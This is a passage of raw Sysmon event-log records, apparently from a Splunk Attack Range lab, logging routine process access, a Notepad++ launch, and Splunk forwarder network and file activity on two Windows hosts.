Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047704Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.268{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001047703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.268{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.268{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.268{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:08.199{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.199{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:08.199{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.199{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:08.199{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F3F4-60EB-147D-00000000CF01}7844C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001047695Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.199{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F3F4-60EB-147D-00000000CF01}7844C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001047694Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.186{466BC892-F3F4-60EB-147D-00000000CF01}7844C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Program 
Files\ansible\AttackRangeSysmon.xml"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 354300x8000000000000000806971Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:08.336{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57224-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806970Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:09.704{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7746F768D5F9891D7F231617EFBD47A8,SHA256=4D662790A6AC6952D89A69C48970F31D2AB423DE3DF6C8ECF084434967770F5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047711Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:09.799{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=502643C7B01D039CD81DB2F1A6513A92,SHA256=3D5F381B06D695553E946A9A2237B597218285E45296A09612FCC3D7E5AC5D26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047710Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:09.184{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59046AA571F1CE41D74E57AB215C47FE,SHA256=8022473F02AF290F8151D95496A41861520358FDDECB6374A5DB7F6EA888AA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047709Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:09.184{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=80302A7F111A85C01213FD83AC6E8F18,SHA256=2C5F67C874E4C95E02FB5721F6F45831EFB541B33A8C2CA9C34AAA41C907DF13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806972Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:10.719{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA85AC53674FF5DC3D2019D66DB9B637,SHA256=082897EE3C9884762FCC4A19DF866312AA7D2A42DA7D0ACEC796BB229935584F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.953{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001047781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.821{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=630548C7B73B1A5B02557A27E1C3DC8C,SHA256=F3140EF4C8C699009FF3F39043740BC45DEF69CF987F7838798C400C58658383,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.635{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FEA818101FA3AE565AD951AEAB47DB5,SHA256=5BB4EFA219D105AAEDC487B3991431BD59C91B5AF5EDB6E249A6D6204E6618D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 